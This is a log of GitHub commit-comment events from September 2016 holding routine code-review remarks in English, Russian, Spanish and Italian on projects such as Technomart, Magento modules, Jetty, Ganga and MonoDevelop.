{"id":"4549010827","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/Cer2016"},"payload":{"comment":{"id":18984006,"position":null,"line":null,"path":null,"commit_id":"e414a858645db86828383b6007c228f01ca274e8","created_at":"2016-09-12T12:35:17Z","updated_at":"2016-09-12T12:35:17Z","body":"[R/collect_files_esses.R:32:9:](https://github.com/richelbilderbeek/Cer2016/blob/e414a858645db86828383b6007c228f01ca274e8/R/collect_files_esses.R#L32) *warning:* **no visible global function definition for ‘collect_file_esses’**\n```r\n​  df <- collect_file_esses(filenames[1])\n        ^~~~~~~~~~~~~~~~~~\n```\n[R/collect_files_esses.R:38:21:](https://github.com/richelbilderbeek/Cer2016/blob/e414a858645db86828383b6007c228f01ca274e8/R/collect_files_esses.R#L38) *warning:* **no visible global function definition for ‘collect_file_esses’**\n```r\n​    df <- rbind(df, collect_file_esses(filename))\n                    ^~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-12T12:35:17Z"}
{"id":"4549011649","type":"CommitCommentEvent","actor":{"login":"dardelean"},"repo":{"name":"dardelean/install-rdo"},"payload":{"comment":{"id":18984008,"position":69,"line":320,"path":"install-rdo.sh","commit_id":"a4faee43f2434418c9c2a1a029831bc4b9a0c8fb","created_at":"2016-09-12T12:35:26Z","updated_at":"2016-09-12T12:35:26Z","body":"add exec_with_retry 5 0 on this"}},"created_at":"2016-09-12T12:35:26Z"}
{"id":"4549014563","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984017,"position":219,"line":219,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:36:07Z","updated_at":"2016-09-12T12:36:07Z","body":"Есть стандартное название для этого элемента, принятое в среде разработки - pagintion, "}},"created_at":"2016-09-12T12:36:07Z"}
{"id":"4549015785","type":"CommitCommentEvent","actor":{"login":"milliams"},"repo":{"name":"ganga-devs/ganga"},"payload":{"comment":{"id":18984019,"position":7,"line":77,"path":"python/Ganga/test/GPI/FileTests/TestLocalFileClient.py","commit_id":"2e77169c8445bc4120467693638a8d079002c78d","created_at":"2016-09-12T12:36:22Z","updated_at":"2016-09-12T12:36:22Z","body":"The `6.3-features` branch is not a staging area, it should always be in a mergeable and releasable state. Nothing should be merged into it which you are not happy going into the release. Treat it like `develop` in that sense."}},"created_at":"2016-09-12T12:36:22Z"}
{"id":"4549016518","type":"CommitCommentEvent","actor":{"login":"phsym"},"repo":{"name":"phsym/prettytable-rs"},"payload":{"comment":{"id":18984021,"position":null,"line":null,"path":null,"commit_id":"aefbfdb4152580735be05e832413160be62e297c","created_at":"2016-09-12T12:36:31Z","updated_at":"2016-09-12T12:36:31Z","body":"#34"}},"created_at":"2016-09-12T12:36:31Z"}
{"id":"4549019263","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"TeoTwawki/darkstar"},"payload":{"comment":{"id":18984027,"position":9,"line":65,"path":"scripts/zones/Attohwa_Chasm/mobs/Sargas.lua","commit_id":"c0046dc1c72a5873d0fe36241dc326b09fbdc3e6","created_at":"2016-09-12T12:37:08Z","updated_at":"2016-09-12T12:37:08Z","body":"https://github.com/TeoTwawki/darkstar/commit/c2ab911a8433dca482e7bffa93a2517e16cd0b38#diff-c7210e34f9622ddc8f1941ecd81f2404\r\nWhen you move the guts into onMobDespawn, gotta remember we still need the onMobDeath to exist. :wink: "}},"created_at":"2016-09-12T12:37:08Z"}
{"id":"4549019532","type":"CommitCommentEvent","actor":{"login":"akorshun"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18984028,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-12T12:37:11Z","updated_at":"2016-09-12T12:37:11Z","body":"@sndnvaps try to load borring ssl like preload"}},"created_at":"2016-09-12T12:37:11Z"}
{"id":"4549021042","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"TeoTwawki/darkstar"},"payload":{"comment":{"id":18984031,"position":9,"line":65,"path":"scripts/zones/Attohwa_Chasm/mobs/Sargas.lua","commit_id":"c0046dc1c72a5873d0fe36241dc326b09fbdc3e6","created_at":"2016-09-12T12:37:28Z","updated_at":"2016-09-12T12:37:28Z","body":"@ymkc "}},"created_at":"2016-09-12T12:37:28Z"}
{"id":"4549022774","type":"CommitCommentEvent","actor":{"login":"eswos"},"repo":{"name":"eswos/helloWorld"},"payload":{"comment":{"id":18984033,"position":null,"line":null,"path":null,"commit_id":"7b2473c2ca419d90dcb697f010eb8bdb83f140fd","created_at":"2016-09-12T12:37:51Z","updated_at":"2016-09-12T12:37:51Z","body":"no code yet. coming soon?"}},"created_at":"2016-09-12T12:37:51Z"}
{"id":"4549023470","type":"CommitCommentEvent","actor":{"login":"Srikar1208"},"repo":{"name":"Srikar1208/datasciencecoursera"},"payload":{"comment":{"id":18984036,"position":null,"line":null,"path":null,"commit_id":"772fbeb6f4a8fcfe11810977a1a5e7163f1e53e6","created_at":"2016-09-12T12:38:00Z","updated_at":"2016-09-12T12:38:00Z","body":"created new one\r\n"}},"created_at":"2016-09-12T12:38:00Z"}
{"id":"4549024075","type":"CommitCommentEvent","actor":{"login":"alanmcgovern"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":18984040,"position":1,"line":1,"path":"main/src/addins/MonoDevelop.UnitTesting.NUnit/NUnit3Runner/NUnit3Runner64.csproj","commit_id":"2006a09de07c5710652aa9d90f80e77f7f6118f8","created_at":"2016-09-12T12:38:09Z","updated_at":"2016-09-12T12:38:09Z","body":"i didn't realise it was impossible to pre-set the bitness on windows. Thats annoying!"}},"created_at":"2016-09-12T12:38:09Z"}
{"id":"4549025097","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984041,"position":226,"line":226,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:38:22Z","updated_at":"2016-09-12T12:38:22Z","body":"зачем у вас тут снова aside? во первых этот блок обычно используют для бокового блока (снова посмотрите шпаргалку http://joxi.ru/4AkyN9GTMdZ17m), а во вторых вы уже его использовали, замените на div или section, "}},"created_at":"2016-09-12T12:38:22Z"}
{"id":"4549027920","type":"CommitCommentEvent","actor":{"login":"noso2k1"},"repo":{"name":"openfootball/it-italy"},"payload":{"comment":{"id":18984047,"position":null,"line":null,"path":null,"commit_id":"95d0258136d9a341e839917ae3891a1cf5f0bca1","created_at":"2016-09-12T12:38:57Z","updated_at":"2016-09-12T12:38:57Z","body":"You're welcome!"}},"created_at":"2016-09-12T12:38:57Z"}
{"id":"4549028424","type":"CommitCommentEvent","actor":{"login":"gpedrazag"},"repo":{"name":"IS00121-2016-02-3/STF"},"payload":{"comment":{"id":18984048,"position":null,"line":null,"path":null,"commit_id":"3e75bc2f675fbf47c07744817a9dfe5ae25e5cca","created_at":"2016-09-12T12:39:04Z","updated_at":"2016-09-12T12:39:04Z","body":"Hola,\n\n\nYa actualice los permisos del repositorio. Por favor verifique nuevamente.\n\n\nSaludos,\n\n\nGilberto\n\n\nGilberto Pedraza García\nEstudiante Doctorado en Ingeniería\nUniversidad de los Andes\ng.pedraza56@uniandes.edu.co\nTel: [57] 3112622219<tel:%5B571%5D%203394949%20ext.%203129>\nCr. 1 Este # 19 A-40\nEdificio Mario Laserna oficina ML754\nBogotá D.C., Colombia\n________________________________\nDe: eliasmajad <notifications@github.com>\nEnviado: domingo, 11 de septiembre de 2016 6:29:03 p. m.\nPara: IS00121-2016-02-3/STF\nCc: Gilberto Pedraza Garcia; Author\nAsunto: Re: [IS00121-2016-02-3/STF] Initial commit (3e75bc2)\n\n\nprofe creo que no tenemos acceso para hacer push al parecer estamos en solo lectura segun vi en foros porque no me deja hacer push del proyecto, no se si ud deba darnos ese acceso\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/IS00121-2016-02-3/STF/commit/3e75bc2f675fbf47c07744817a9dfe5ae25e5cca#commitcomment-18978555>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AQJMNdtF9TMhckiilqpE1vRdanlw6-E9ks5qpI6_gaJpZM4J6IoT>.\n"}},"created_at":"2016-09-12T12:39:04Z"}
{"id":"4549031413","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"flar2/kenzo"},"payload":{"comment":{"id":18984054,"position":162,"line":162,"path":"drivers/input/touchscreen/wake_gestures.c","commit_id":"a121b245eddb5bb12cf0385c29edd298e10137c1","created_at":"2016-09-12T12:39:43Z","updated_at":"2016-09-12T12:39:43Z","body":"Error on compilation, need to add this line to:\r\n\r\ndrivers/platform/msm/qpnp-haptic.c\r\n\r\n@1654:\r\n\r\n> void set_vibrate(int value)\r\n> {\r\n> \tqpnp_hap_td_enable(&ghap->timed_dev, value);\r\n> }"}},"created_at":"2016-09-12T12:39:43Z"}
{"id":"4549036411","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984067,"position":228,"line":228,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:40:49Z","updated_at":"2016-09-12T12:40:49Z","body":"Приучайте себя использовать все многообразие тегов, а то в погоне за модой мы лепим много где section,article и aside, а старые добрые теги например цитат, или определений - даже не знаем что они есть. Используйте здесь теги dl, dt, dd - http://htmlbook.ru/html/dl"}},"created_at":"2016-09-12T12:40:49Z"}
{"id":"4549036841","type":"CommitCommentEvent","actor":{"login":"blakethepatton"},"repo":{"name":"haani-niyaz/learning-nodejs-crud"},"payload":{"comment":{"id":18984069,"position":1,"line":1,"path":"public/public/views/pages/home.ejs","commit_id":"d24983f5b646b8cd7fdfe4fa3bacb17b41e89efc","created_at":"2016-09-12T12:40:55Z","updated_at":"2016-09-12T12:40:55Z","body":"should be jumbotron just remove the p"}},"created_at":"2016-09-12T12:40:55Z"}
{"id":"4549038989","type":"CommitCommentEvent","actor":{"login":"DylanKane"},"repo":{"name":"azpopov/2016Team4"},"payload":{"comment":{"id":18984078,"position":null,"line":null,"path":null,"commit_id":"9264a6d4b932da8d28d63cab7178be63fb10b8b0","created_at":"2016-09-12T12:41:23Z","updated_at":"2016-09-12T12:41:23Z","body":"Nice test, would watch again"}},"created_at":"2016-09-12T12:41:23Z"}
{"id":"4549039132","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18984080,"position":122,"line":122,"path":"app/code/local/Oggetto/OneClick/Block/Adminhtml/OneClick/Grid.php","commit_id":"d51d6a17210d3e51d78e4d71757554d11c085baf","created_at":"2016-09-12T12:41:24Z","updated_at":"2016-09-12T12:41:24Z","body":"нужно создать отдельную модель для статусов, сами статусы вынести в константы, а для грида создать метод toOptionArray, возвращающий массив"}},"created_at":"2016-09-12T12:41:24Z"}
{"id":"4549043792","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":18984086,"position":1,"line":1,"path":"main/src/addins/MonoDevelop.UnitTesting.NUnit/NUnit3Runner/NUnit3Runner64.csproj","commit_id":"2006a09de07c5710652aa9d90f80e77f7f6118f8","created_at":"2016-09-12T12:42:23Z","updated_at":"2016-09-12T12:42:23Z","body":"Preset, yes. But you need 2 different assemblies to support 32/64bit."}},"created_at":"2016-09-12T12:42:23Z"}
{"id":"4549043880","type":"CommitCommentEvent","actor":{"login":"sbordet"},"repo":{"name":"eclipse/jetty.project"},"payload":{"comment":{"id":18984088,"position":12,"line":85,"path":"jetty-servlet/src/test/java/org/eclipse/jetty/servlet/StatisticsServletTest.java","commit_id":"1cb705ff3402ccb02f52cbf85b325a4f1c609926","created_at":"2016-09-12T12:42:24Z","updated_at":"2016-09-12T12:42:24Z","body":"Then I guess there is an initialization problem in the `Statistics` class. What class is that ?"}},"created_at":"2016-09-12T12:42:24Z"}
{"id":"4549045689","type":"CommitCommentEvent","actor":{"login":"seveniruby"},"repo":{"name":"lightbody/browsermob-proxy"},"payload":{"comment":{"id":18984092,"position":null,"line":null,"path":null,"commit_id":"180ddb27b3e754ad8a99893707a996f9ee532db5","created_at":"2016-09-12T12:42:49Z","updated_at":"2016-09-12T12:42:49Z","body":"i use version 2.1.2 and already import ca-certificate-rsa.cer to my phone\r\nwhen i  proxy requests like https://101.201.62.21:443/xxx.json\r\nmy app throw a error like \r\n```\r\nE/NotificationsUtil( 5010): com.android.volley.l: javax.net.ssl.SSLPeerUnverifiedException: Hostname 101.201.62.21 not verified:\r\nE/NotificationsUtil( 5010):     certificate: sha1/GW+z5iW3WvMiq21wr989fBJuKJM=\r\nE/NotificationsUtil( 5010):     DN: OU=LittleProxy MITM,O=Impersonated Certificate,CN=101.201.62.21\r\nE/NotificationsUtil( 5010):     subjectAltNames: [101.201.62.21]\r\n```\r\nwhen i use keytool to generate a new cer file and review the content , the content just like \r\n```\r\n所有者: CN=192.168.1.103, OU=soft, O=xab, L=FengTai, ST=Beijing, C=cn\r\n发布者: CN=192.168.1.103, OU=soft, O=xab, L=FengTai, ST=Beijing, C=cn\r\n\r\n#1: ObjectId: 2.5.29.17 Criticality=false\r\nSubjectAlternativeName [\r\n  IPAddress: 192.168.1.103\r\n]\r\n```\r\nmay i ask for a help?\r\n"}},"created_at":"2016-09-12T12:42:49Z"}
{"id":"4549046285","type":"CommitCommentEvent","actor":{"login":"zebapy"},"repo":{"name":"richardnd5/colors"},"payload":{"comment":{"id":18984095,"position":5,"line":25,"path":"src/NumberApp.js","commit_id":"ffde9d49863dc8cbcc9a9fee5aa1198da7446727","created_at":"2016-09-12T12:42:56Z","updated_at":"2016-09-12T12:42:56Z","body":"@richardnd5 you should use `setState` and state to handle manipulations like this. It's what react does best :) We can show you sometime"}},"created_at":"2016-09-12T12:42:56Z"}
{"id":"4549047624","type":"CommitCommentEvent","actor":{"login":"christoffersch"},"repo":{"name":"SanderSalamander/salamander-conky-config"},"payload":{"comment":{"id":18984101,"position":null,"line":null,"path":null,"commit_id":"8e94fafcdaa810503c7848ed396aa5bd71f1600f","created_at":"2016-09-12T12:43:15Z","updated_at":"2016-09-12T12:43:15Z","body":"@SanderSalamander :)"}},"created_at":"2016-09-12T12:43:15Z"}
{"id":"4549047878","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":18984102,"position":null,"line":null,"path":null,"commit_id":"812c82913fcc9dc2f2a347a40dd4d1ff50022336","created_at":"2016-09-12T12:43:17Z","updated_at":"2016-09-12T12:43:17Z","body":":+1:"}},"created_at":"2016-09-12T12:43:17Z"}
{"id":"4549049082","type":"CommitCommentEvent","actor":{"login":"rob-c"},"repo":{"name":"ganga-devs/ganga"},"payload":{"comment":{"id":18984106,"position":7,"line":77,"path":"python/Ganga/test/GPI/FileTests/TestLocalFileClient.py","commit_id":"2e77169c8445bc4120467693638a8d079002c78d","created_at":"2016-09-12T12:43:32Z","updated_at":"2016-09-12T12:43:32Z","body":"This was a comment relating on work to be done, which is now done within this PR anyway.\r\nEffectively I could have but a `#TODO` here but it was for myself rather than to suggest work for others to do once I had finished something else I was working on.\r\nThe branch stability isn't effected by a comment in the tests,"}},"created_at":"2016-09-12T12:43:32Z"}
{"id":"4549049586","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18984107,"position":null,"line":null,"path":null,"commit_id":"f81a5fe3017d37106ad3d96f26d152f151a7f133","created_at":"2016-09-12T12:43:38Z","updated_at":"2016-09-12T12:43:38Z","body":"Uh. There are cases where it makes sense. "}},"created_at":"2016-09-12T12:43:38Z"}
{"id":"4549049790","type":"CommitCommentEvent","actor":{"login":"hjoliver"},"repo":{"name":"benfitzpatrick/cylc-tutorial"},"payload":{"comment":{"id":18984110,"position":94,"line":242,"path":"suite-writing.tex","commit_id":"6994317d4fc2bcf2c1880a6426516da9bd53cd79","created_at":"2016-09-12T12:43:41Z","updated_at":"2016-09-12T12:43:41Z","body":"(I ran into problems with that too; and the non-ASCII single quotes that you've removed :grimacing: )"}},"created_at":"2016-09-12T12:43:41Z"}
{"id":"4549055408","type":"CommitCommentEvent","actor":{"login":"llde"},"repo":{"name":"Forlini91/ForliScript"},"payload":{"comment":{"id":18984125,"position":101,"line":101,"path":"ForliScript/TestProgram.fosc","commit_id":"f1e0fcbcbf9359bf5440d79fae4a85e0247986f9","created_at":"2016-09-12T12:44:52Z","updated_at":"2016-09-12T12:44:52Z","body":"Sono appena morto dalle risate sappilo.  "}},"created_at":"2016-09-12T12:44:52Z"}
{"id":"4549057075","type":"CommitCommentEvent","actor":{"login":"milliams"},"repo":{"name":"ganga-devs/ganga"},"payload":{"comment":{"id":18984128,"position":null,"line":null,"path":null,"commit_id":"b41ed37803ad26277a95c75dffae4eb93330c08d","created_at":"2016-09-12T12:45:14Z","updated_at":"2016-09-12T12:45:14Z","body":"Given that this has nothing to do with `IGangaFile` it would have been neater to have this as a separate PR but it looks fine so whatever."}},"created_at":"2016-09-12T12:45:14Z"}
{"id":"4549058698","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984131,"position":231,"line":231,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:45:33Z","updated_at":"2016-09-12T12:45:33Z","body":"Header и footer обычно эти блоки повторяются на всех страницах проекта. Значит в них нужно заключать те блоки, которые остаются неизменными. В footer элементы начиная от логотипа и ниже как раз будут статичными, их не нужно выносить в отдельный блок, лучше разделить внутри футера на несколько section "}},"created_at":"2016-09-12T12:45:33Z"}
{"id":"4549058944","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":18984133,"position":null,"line":null,"path":null,"commit_id":"8ecb76dd0d573ac5bd1992e85af085de3086fc37","created_at":"2016-09-12T12:45:36Z","updated_at":"2016-09-12T12:45:36Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;cdsTTtbu&#x2F;1994-bug-993820-ceph-deploy-does-not-install-package-ceph-on-mds\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug 993820 - ceph-deploy does not install package ceph on MDS</a>"}},"created_at":"2016-09-12T12:45:36Z"}
{"id":"4549061543","type":"CommitCommentEvent","actor":{"login":"erszcz"},"repo":{"name":"erszcz/learning"},"payload":{"comment":{"id":18984141,"position":2,"line":2,"path":"erlang-rel1/config/example.template","commit_id":"c019e8e0ac9fd614666717c40efb7bf5f304ab46","created_at":"2016-09-12T12:46:10Z","updated_at":"2016-09-12T12:46:10Z","body":"The template gets expanded to\r\n\r\n```\r\n[\r\n  { rel1, [{ fake_env_var, B�Dz| }] }\r\n].\r\n```"}},"created_at":"2016-09-12T12:46:10Z"}
{"id":"4549063498","type":"CommitCommentEvent","actor":{"login":"sbordet"},"repo":{"name":"eclipse/jetty.project"},"payload":{"comment":{"id":18984144,"position":18,"line":81,"path":"jetty-servlet/src/test/java/org/eclipse/jetty/servlet/StatisticsServletTest.java","commit_id":"90d6687300f24f17b4ecfdd0b59df3f0893ed519","created_at":"2016-09-12T12:46:35Z","updated_at":"2016-09-12T12:46:35Z","body":"If you pass `_server` to `ServletContextHandler` then you are impliticly make `_server` the parent handler of `ServletContextHandler`, or - equivalently - making so that `_server -> statsContext`.\r\n\r\nThe chain must be `_server -> statsHandler -> statsContext`.\r\n\r\n```java\r\nServer server = new Server();\r\nStatisticsHandler statsHandler = new StatisticsHandler();\r\nserver.setHandler(statsHandler);\r\nServletContextHandler statsContext = new ServletContextHandler(statsHandler, \"/\");\r\n```"}},"created_at":"2016-09-12T12:46:35Z"}
{"id":"4549066408","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18984155,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T12:47:11Z","updated_at":"2016-09-12T12:47:11Z","body":"It's not much work, even, mostly automatic."}},"created_at":"2016-09-12T12:47:11Z"}
{"id":"4549070997","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":18984169,"position":4,"line":3,"path":"Library/Homebrew/dev-cmd/test-bot.rb","commit_id":"ebdb879fe4b0d14bcc92480a3dd193c93f94a23f","created_at":"2016-09-12T12:48:09Z","updated_at":"2016-09-12T12:48:09Z","body":"`Tests the full lifecycle of a formula or Homebrew/brew change`."}},"created_at":"2016-09-12T12:48:09Z"}
{"id":"4549072330","type":"CommitCommentEvent","actor":{"login":"cameel"},"repo":{"name":"Code-Poets/sandbox"},"payload":{"comment":{"id":18984172,"position":28,"line":38,"path":"and-kisorec/wikiscraper/views.py","commit_id":"d6a48cbe31a1bc6af6385fab160dff7d5f7bf38d","created_at":"2016-09-12T12:48:25Z","updated_at":"2016-09-12T12:48:25Z","body":"You need an `else` here too."}},"created_at":"2016-09-12T12:48:25Z"}
{"id":"4549073637","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18984176,"position":56,"line":56,"path":"app/code/local/Oggetto/OneClick/Model/OneClickLog.php","commit_id":"d51d6a17210d3e51d78e4d71757554d11c085baf","created_at":"2016-09-12T12:48:41Z","updated_at":"2016-09-12T12:48:41Z","body":"В бд маджето обычно дату хранят в GMT, а фронте выводится уже согласно локали, поэтому лучше написать так:\r\nMage::getModel('core/date')->gmtDate('Y-m-d H:i:s')"}},"created_at":"2016-09-12T12:48:41Z"}
{"id":"4549073786","type":"CommitCommentEvent","actor":{"login":"raphael-boucher"},"repo":{"name":"Polyconseil/systematic"},"payload":{"comment":{"id":18984177,"position":4,"line":160,"path":"mk/main.mk","commit_id":"37bb318d7715f4ee79e78fb91e6d9352a747a533","created_at":"2016-09-12T12:48:43Z","updated_at":"2016-09-12T12:48:43Z","body":"Why and when is that buggy?"}},"created_at":"2016-09-12T12:48:43Z"}
{"id":"4549076746","type":"CommitCommentEvent","actor":{"login":"cameel"},"repo":{"name":"Code-Poets/sandbox"},"payload":{"comment":{"id":18984185,"position":28,"line":38,"path":"and-kisorec/wikiscraper/views.py","commit_id":"d6a48cbe31a1bc6af6385fab160dff7d5f7bf38d","created_at":"2016-09-12T12:49:21Z","updated_at":"2016-09-12T12:49:21Z","body":"What happens if `(len(subject_links) > 0):`?"}},"created_at":"2016-09-12T12:49:21Z"}
{"id":"4549076884","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984186,"position":253,"line":253,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:49:22Z","updated_at":"2016-09-12T12:49:22Z","body":"теряете суть БЭМа, у вас блок называется main-footer, а блок в нем уже footer-company-validation.. часть названия класса должна повторять название родительского блока, чтобы было понятно их \"родство\".  Просто переименуйте в main-footer в footer "}},"created_at":"2016-09-12T12:49:22Z"}
{"id":"4549078591","type":"CommitCommentEvent","actor":{"login":"goligo"},"repo":{"name":"SAP/openui5"},"payload":{"comment":{"id":18984192,"position":null,"line":null,"path":null,"commit_id":"348cdf88e51b0401c178d71d0756700ba479d37e","created_at":"2016-09-12T12:49:44Z","updated_at":"2016-09-12T12:49:44Z","body":"@ndown Maybe you can provide an example, where the current implementation doesn't give the expected result? Of course we do deep sorting by default, if multiple sorters are given..."}},"created_at":"2016-09-12T12:49:44Z"}
{"id":"4549084391","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984209,"position":256,"line":256,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:51:00Z","updated_at":"2016-09-12T12:51:00Z","body":"<p> это текстовый тег - в него ничего кроме текста не вкладывается. Замените на div. И \"footer-contact\" пишется так (с одной n) "}},"created_at":"2016-09-12T12:51:00Z"}
{"id":"4549085328","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18984212,"position":32,"line":32,"path":"app/code/local/Oggetto/OneClick/Model/Order.php","commit_id":"d51d6a17210d3e51d78e4d71757554d11c085baf","created_at":"2016-09-12T12:51:12Z","updated_at":"2016-09-12T12:51:12Z","body":"лучше унаследоваться от Mage_Adminhtml_Model_Sales_Order_Create и удалить дублирующейся код"}},"created_at":"2016-09-12T12:51:12Z"}
{"id":"4549087516","type":"CommitCommentEvent","actor":{"login":"jaylach"},"repo":{"name":"Wyzardsleeves/Blocstuff"},"payload":{"comment":{"id":18984218,"position":24,"line":28,"path":"index.html","commit_id":"ed2b5069590e147b1edd3ebd527b3e7a6c64dda7","created_at":"2016-09-12T12:51:38Z","updated_at":"2016-09-12T12:51:38Z","body":"the html tag is `<section>` not `<sections>` :)"}},"created_at":"2016-09-12T12:51:38Z"}
{"id":"4549088647","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984221,"position":6,"line":17,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:51:52Z","updated_at":"2016-09-12T12:51:52Z","body":"Здесь не нужен список."}},"created_at":"2016-09-12T12:51:52Z"}
{"id":"4549090453","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984225,"position":11,"line":22,"path":"index.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:52:16Z","updated_at":"2016-09-12T12:52:16Z","body":"??? комментарий или класс?"}},"created_at":"2016-09-12T12:52:16Z"}
{"id":"4549093689","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18984231,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T12:52:57Z","updated_at":"2016-09-12T12:52:57Z","body":"PS: working on ANSWER : i realy prefer to have one file for rendering (eventually including another file) than rendering view in qanda_helper .\r\n\r\nIt's really more easy to update.\r\n\r\nI don't think twig can include a twig file ?"}},"created_at":"2016-09-12T12:52:57Z"}
{"id":"4549095403","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18984235,"position":50,"line":50,"path":"app/code/local/Oggetto/OneClick/controllers/Adminhtml/OneClickController.php","commit_id":"d51d6a17210d3e51d78e4d71757554d11c085baf","created_at":"2016-09-12T12:53:20Z","updated_at":"2016-09-12T12:53:20Z","body":"добавляй try/catch и логируй эксепшены"}},"created_at":"2016-09-12T12:53:20Z"}
{"id":"4549100077","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18984247,"position":null,"line":null,"path":null,"commit_id":"852a7d20bc5f0adf17f9c3da32c79474411304ac","created_at":"2016-09-12T12:54:19Z","updated_at":"2016-09-12T12:54:19Z","body":"For what it is worth, I don't see any problem with having function separate from classes. In fact I find separate functions much more useful and reusable than methods which are glued to a class.\r\n"}},"created_at":"2016-09-12T12:54:19Z"}
{"id":"4549105415","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":18984256,"position":null,"line":null,"path":null,"commit_id":"70306e70469fec30d0649b88965871710d4e9c7e","created_at":"2016-09-12T12:55:26Z","updated_at":"2016-09-12T12:55:26Z","body":"Final in dev 185b2a79ab5a4d5a1873e5c1bac0ad2335ba18e6\r\n\r\nFollow up fix in afe393bedca0c865d2b78cd00fc5cb47cead3883"}},"created_at":"2016-09-12T12:55:26Z"}
{"id":"4549106315","type":"CommitCommentEvent","actor":{"login":"alexlin0"},"repo":{"name":"nasa/trick"},"payload":{"comment":{"id":18984258,"position":null,"line":null,"path":null,"commit_id":"54553b5fa9a52b834c1a8a006d1a2f934454bead","created_at":"2016-09-12T12:55:37Z","updated_at":"2016-09-12T12:55:37Z","body":"Thanks for fixing this.  I rarely am in Python 3 as I usually stay with the default python provided by the OS, and that is still usually 2.x."}},"created_at":"2016-09-12T12:55:37Z"}
{"id":"4549107275","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":18984260,"position":null,"line":null,"path":null,"commit_id":"185b2a79ab5a4d5a1873e5c1bac0ad2335ba18e6","created_at":"2016-09-12T12:55:49Z","updated_at":"2016-09-12T12:55:49Z","body":"Follow up fix in afe393bedca0c865d2b78cd00fc5cb47cead3883\r\n"}},"created_at":"2016-09-12T12:55:49Z"}
{"id":"4549111045","type":"CommitCommentEvent","actor":{"login":"zh-m"},"repo":{"name":"NativeScript/nativescript-sdk-examples-ng"},"payload":{"comment":{"id":18984268,"position":3,"line":3,"path":"app/overview.md","commit_id":"bf622f44fa7b8850e3cbc61e44e78a7d810fc8b0","created_at":"2016-09-12T12:56:31Z","updated_at":"2016-09-12T12:56:31Z","body":"10x for the note, I updated the typo."}},"created_at":"2016-09-12T12:56:31Z"}
